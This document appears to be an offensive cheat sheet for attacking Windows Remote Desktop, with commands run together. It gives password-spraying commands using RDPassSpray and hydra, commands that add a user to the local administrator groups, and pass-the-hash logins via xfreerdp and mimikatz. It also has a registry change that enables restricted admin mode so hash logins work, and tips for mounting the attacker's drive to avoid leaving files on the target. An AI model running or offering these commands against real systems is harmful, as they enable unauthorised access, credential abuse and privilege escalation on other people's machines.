#Bruteforce#https://github.com/xFreed0m/RDPassSpray [Note: If <spaces> within the passwords, tool will fail]python3RDPassSpray.py-u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]hydra-V-f-L./users.txt-P./passwords.txtrdp-Mtargets.txt-t1-W3-c5
Connect with known credentials/hash
#net localgroup administrators userx /add#net localgroup "Remote Management Users" userx /addrdesktop-g1600x800-rdisk:tmp=/usr/share/windows-binaries192.168.30.30-upelota-p-g95%xfreerdp /u:admin /p:password /cert:ignore /v:10.10.138.3 /workarea /drive:/localdir,share /dynamic-resolution +clipboard
#In case of error : (ERRCONNECT_CONNECT_TRANSPORT_FAILED)| Add this flag/sec:tls#Connect via hash works if restricted admin is enabled. xfreerdp/u:<user>/d:<domain>/pth:<hash>/v:<IP>sekurlsa::pth/user:<user>/domain<domain>/ntlm:<hash>/run:"mstsc.exe /restrictedadmin"#Enabled restricted admin"HKLM:\System\Current\ControlSet\Control\Lsa"-Name"DisableRestrictedAdmin"-Value"0"-PropertyTypeDWORD-Force
/drive:LOCAL_DIRECTORY,SHARE_NAME -- creates a shared drive between the attacking machine and the target. This switch is insanely useful as it allows us to very easily use our toolkit on the remote target, and save any outputs back directly to our own hard drive. In essence, this means that we never actually have to create any files on the target. For example, to share the current directory in a share called share, you could use: /drive:.,share, with the period (.) referring to the current directory.
When creating a shared drive, this can be accessed either from the command line as \\tsclient\, or through File Explorer under "This PC":
#Bypass prompt for credentials before you establish a remote desktop connectionhttps://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remote-desktop-connection-6-prompts-credentials